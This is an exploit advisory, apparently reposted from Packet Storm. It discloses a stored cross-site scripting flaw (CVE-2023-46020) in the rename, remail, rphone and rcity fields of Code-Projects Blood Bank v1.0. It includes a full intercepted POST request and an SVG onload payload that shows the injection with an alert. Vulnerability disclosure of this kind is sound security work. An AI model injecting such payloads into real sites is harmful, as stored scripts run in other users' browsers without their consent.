# Source: https://packetstormsecurity.com/files/177879/bloodbank10p-xss.txt
# Reposted: https://afaghhosting.net/blog/blood-bank-1-0-cross-site-scripting/ (2024-04-03)

# Exploit Title: Blood Bank v1.0 Stored Cross Site Scripting (XSS)
# Date: 2023-11-14
# Exploit Author: Ersin Erenler
# Vendor Homepage: https://code-projects.org/blood-bank-in-php-with-source-code
# Software Link: https://download-media.code-projects.org/2020/11/Blood_Bank_In_PHP_With_Source_code.zip
# Version: 1.0
# Tested on: Windows/Linux, Apache 2.4.54, PHP 8.2.0
# CVE : CVE-2023-46020

-------------------------------------------------------------------------------

# Description:

The parameters rename, remail, rphone, and rcity in the /file/updateprofile.php file of Code-Projects Blood Bank V1.0 are susceptible to Stored Cross-Site Scripting (XSS). This vulnerability arises due to insufficient input validation and sanitation of user-supplied data. An attacker can exploit this weakness by injecting malicious scripts into these parameters, which, when stored on the server, may be executed when other users view the affected user's profile.

Vulnerable File: updateprofile.php

Parameters: rename, remail, rphone, rcity

# Proof of Concept:
----------------------

1. Intercept the POST request to updateprofile.php via Burp Suite
2. Inject the payload to the vulnerable parameters
3. Payload: "><svg/onload=alert(document.domain)>
4. Example request for rname parameter:

---

POST /bloodbank/file/updateprofile.php HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/119.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded
Content-Length: 103
Origin: http://localhost
Connection: close
Referer: http://localhost/bloodbank/rprofile.php?id=1
Cookie: PHPSESSID=<some-cookie-value>
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1

rname=test"><svg/onload=alert(document.domain)>&remail=test%40gmail.com&rpassword=test&rphone=8875643456&rcity=lucknow&bg=A%2B&update=Update

----

5. Go to the profile page and trigger the XSS

XSS Payload:

"><svg/onload=alert(document.domain)>